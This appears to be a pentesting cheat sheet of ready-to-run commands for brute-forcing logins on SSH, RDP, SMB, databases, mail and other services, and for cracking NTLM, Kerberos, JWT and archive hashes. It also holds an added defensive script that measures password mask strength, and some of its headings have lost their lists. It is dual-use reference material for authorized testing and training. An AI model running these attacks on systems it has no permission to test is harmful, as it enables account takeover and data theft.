Default Credentials
Always start by trying default credentials before launching a full brute-force attack:
Creating Custom Dictionaries
Crunch
crunch 4 6 0123456789ABCDEF -o crunch1.txt # Length 4-6, hex chars
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Exactly length 4
crunch 6 8 -t ,@@^^%% # Pattern: uppercase, lower, lower, special, special, digit, digit
CeWL — Website Wordlist Generator
cewl example.com -m 5 -w words.txt # Min length 5, from target site
CUPP — Profile-Based Passwords
python3 cupp.py -i # Interactive mode based on target's personal info
Wister
python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
Recommended Wordlists
Services — Brute Force Commands
hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
# Key-based brute force
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21
hydra -L users.txt -P passwords.txt sizzle.htb.local http-get /certsrv/
medusa -h <IP> -u <username> -P passwords.txt -M http -m DIR:/path/to/auth -T 10
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/
hydra -L users.txt -P passwords.txt domain.htb http-post-form \
"/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect"
# For HTTPS use https-post-form
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L userlist -P passlist rdp://<IP>
legba rdp --target localhost:3389 --username admin --password data/passwords.txt
nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
legba smb --target share.company.com --username admin --password data/passwords.txt
hydra -L usernames.txt -P pass.txt <IP> mysql
medusa -h <IP> -u <username> -P password_list -M mysql
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306
# MSSQLPwner
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433
hydra -L user.txt -P pass.txt <IP> postgres
ncrack -U user.txt -P pass.txt <IP>:5432
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> smtp -S -v -V
legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25
hydra -L user.txt -P pass.txt -s <PORT> <IP> vnc
medusa -h <IP> -u root -P pass.txt -M vnc
nmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt <IP>
legba vnc --target localhost:5901 --password data/passwords.txt
nmap --script ldap-brute -p 389 <IP>
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org
hydra -l root -P passwords.txt [-t 32] <IP> telnet
legba telnet --username admin --password wordlists/passwords.txt --target localhost:23 \
--telnet-user-prompt "login: " --telnet-pass-prompt "Password: "
nmap -sU --script snmp-brute <target>
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
hashcat -m 16500 -a 0 jwt.txt rockyou.txt
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
python3 jwt_tool.py -d wordlists.txt <JWT_token>
Hash Cracking — Local
Online Cracking Databases
Hashcat
# Wordlist attack with rules
hashcat -a 0 -m 1000 ntlm.txt rockyou.txt -r rules/best64.rule
# Mask attack (uppercase + 6 lowercase + digit)
hashcat -a 3 -m 1000 ntlm.txt ?u?l?l?l?l?l?l?d
# Combinator attack (combine two wordlists)
hashcat -a 1 -m 1000 ntlm.txt wordlist1.txt wordlist2.txt
# Common hash modes
# 1000 = NTLM
# 1800 = sha512crypt (Linux $6$)
# 3200 = bcrypt
# 13100 = Kerberoast (TGS-REP)
# 16800 = WPA-PMKID-PBKDF2
# 22000 = WPA-PBKDF2-PMKID+EAPOL
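Seen from the defender's side, the mask attack above explains why passwords that follow a predictable shape are weak even when they pass a complexity policy. The following is an added example, not part of the original page: it derives the narrowest built-in hashcat mask for each password and the number of candidates that mask spans. The `10**15` threshold and the sample passwords are assumptions chosen for illustration.

```python
import string

# Sizes of hashcat's built-in mask charsets (?s is space plus 32 symbols).
CHARSET_SIZE = {"?l": 26, "?u": 26, "?d": 10, "?s": 33}

def mask_of(password):
    """Return the narrowest built-in hashcat mask that covers `password`."""
    out = []
    for ch in password:
        if ch in string.ascii_lowercase:
            out.append("?l")
        elif ch in string.ascii_uppercase:
            out.append("?u")
        elif ch in string.digits:
            out.append("?d")
        elif ch == " " or ch in string.punctuation:
            out.append("?s")
        else:
            raise ValueError(f"{ch!r} is outside the ?l ?u ?d ?s charsets")
    return "".join(out)

def keyspace(mask):
    """Number of candidates needed to exhaust `mask`."""
    total = 1
    for i in range(0, len(mask), 2):
        total *= CHARSET_SIZE[mask[i:i + 2]]
    return total

def audit(passwords, min_keyspace=10**15):
    """Return (password, mask, keyspace) for passwords whose mask is cheap to exhaust.

    min_keyspace is an assumed policy threshold, not a hashcat value.
    """
    weak = []
    for pw in passwords:
        mask = mask_of(pw)
        size = keyspace(mask)
        if size < min_keyspace:
            weak.append((pw, mask, size))
    return weak

# Constructed sample passwords, not taken from any real data set.
SAMPLE = ["Passwor1", "Summer2022!", "k7#Qz!m2Lp@x9"]

if __name__ == "__main__":
    for pw, mask, size in audit(SAMPLE):
        print(f"{pw}: mask {mask}, {size:,} candidates")
```
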
John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
Archive and File Cracking
# ZIP
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
zip2john file.zip > zip.john && john zip.john
# PDF
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
# KeePass
keepass2john file.kdbx > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
# LUKS disk encryption
bruteforce-luks -f ./list.txt ./backup.img
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt